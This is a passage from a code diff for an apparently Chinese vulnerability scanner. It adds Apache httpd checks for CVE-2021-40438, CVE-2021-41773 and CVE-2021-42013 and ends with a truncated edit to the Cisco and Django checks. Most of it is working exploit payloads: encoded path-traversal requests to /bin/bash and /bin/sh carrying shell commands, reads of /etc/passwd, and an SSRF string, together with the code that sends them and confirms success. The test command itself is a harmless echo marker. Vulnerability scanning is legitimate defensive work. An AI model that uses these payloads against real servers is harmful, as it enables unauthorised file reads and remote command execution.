+ Paylaod: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py
+
+ 3. Apache HTTP Server 2.4.50 路径遍历
+ CVE-2021-42013
+ Payload: https://vulhub.org/#/environments/httpd/CVE-2021-42013/
+
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from thirdparty import requests
+from thirdparty import HackRequests
+from time import sleep
+
+class ApacheHttpd():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+ self.proxy = config.get('proxy')
+
+ self.app_name = 'ApacheHttpd'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2021_40438_payloads = [
+ {
+ 'path': '?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/',
+ 'data': ''
+ },
+ ]
+
+ self.cve_2021_41773_payloads = [
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh',
+ 'data': 'echo Content-Type: text/plain; echo; {}'.format(self.cmd)
+ },
+ {
+ 'path': 'icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': '.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',
+ 'data': ''
+ },
+ ]
+
+ self.cve_2021_42013_payloads = [
+ {
+ 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': 'cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh',
+ 'data': 'echo;{}'.format(self.cmd)
+ },
+ {
+ 'path': 'icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
+ 'data': ''
+ },
+ {
+ 'path': '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd',
+ 'data': ''
+ }
+ ]
+
+ def cve_2021_40438_scan(self, url):
+ ''' httpd的mod_proxy存在服务器端请求伪造(SSRF)
+ 该漏洞允许未经身份验证的远程攻击者使 httpd 服务器将请求转发到任意服务器
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'SSRF'
+ vul_info['vul_id'] = 'CVE-2021-40438'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_40438_payloads:
+ path = payload['path']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ try:
+ hack = HackRequests.hackRequests()
+
+ res = hack.http(
+ target,
+ method='GET',
+ timeout=self.timeout,
+ headers=self.headers,
+ proxy=self.proxy,
+ location=False
+ )
+ res.method = vul_info['vul_method']
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('This domain is for use in illustrative examples in documents.' in res.text())
+ and ('domain in literature without prior coordination or asking for permission.' in res.text())
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def cve_2021_41773_scan(self, url):
+ ''' 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷,
+ 攻击者可以使用路径遍历攻击将URL映射到网站根目录预期之外的文件
+ 在特定情况下, 攻击者可构造恶意请求执行系统命令
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_id'] = 'CVE-2021-41773'
+ # vul_info['vul_method'] = 'GET/POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_41773_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if data:
+ method = 'POST'
+ else:
+ method = 'GET'
+
+ req = requests.Request(
+ method=method,
+ url=target,
+ data=data,
+ headers=self.headers
+ ).prepare()
+
+ req.url = target
+ session = requests.session()
+
+ res = session.send(
+ req,
+ timeout=self.timeout,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((self.md in check.check_res(res.text, self.md))
+ or ('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def cve_2021_42013_scan(self, url):
+ ''' CVE-2021-42013是CVE-2021-41773的绕过, 使用.%%32%65/ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'FileRead/RCE'
+ vul_info['vul_id'] = 'CVE-2021-42013'
+ # vul_info['vul_method'] = 'GET/POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2021_42013_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if data:
+ method = 'POST'
+ else:
+ method = 'GET'
+
+ hack = HackRequests.hackRequests()
+
+ res = hack.http(
+ target,
+ method=method,
+ data=data,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxy=self.proxy,
+ location=False
+ )
+
+ res.method = method
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ((self.md in check.check_res(res.text(), self.md))
+ or ('/sbin/nologin' in res.text())
+ or ('root:x:0:0:root' in res.text())
+ or ('Microsoft Corp' in res.text())
+ or ('Microsoft TCP/IP for Windows' in res.text())
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2021_40438_scan, url=url),
+ thread(target=self.cve_2021_41773_scan, url=url),
+ thread(target=self.cve_2021_42013_scan, url=url)
+ ]
+
+httpd = ApacheHttpd()
diff --git a/payloads/Cisco.py b/payloads/Cisco.py
index beb3388..1d79419 100644
--- a/payloads/Cisco.py
+++ b/payloads/Cisco.py
@@ -73,7 +73,7 @@ def cve_2020_3580_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ("alert('3580')" in res.text):
+ if ("onload=alert('3580')" in res.text):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/Django.py b/payloads/Django.py
index 08371ed..955003f 100644
--- a/payloads/Django.py
+++ b/payloads/Django.py
@@ -155,7 +155,7 @@ def cve_2017_12794_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if ("prompt('12794')" in check.check_res(res2.text, "prompt('12794')")):
+ if ("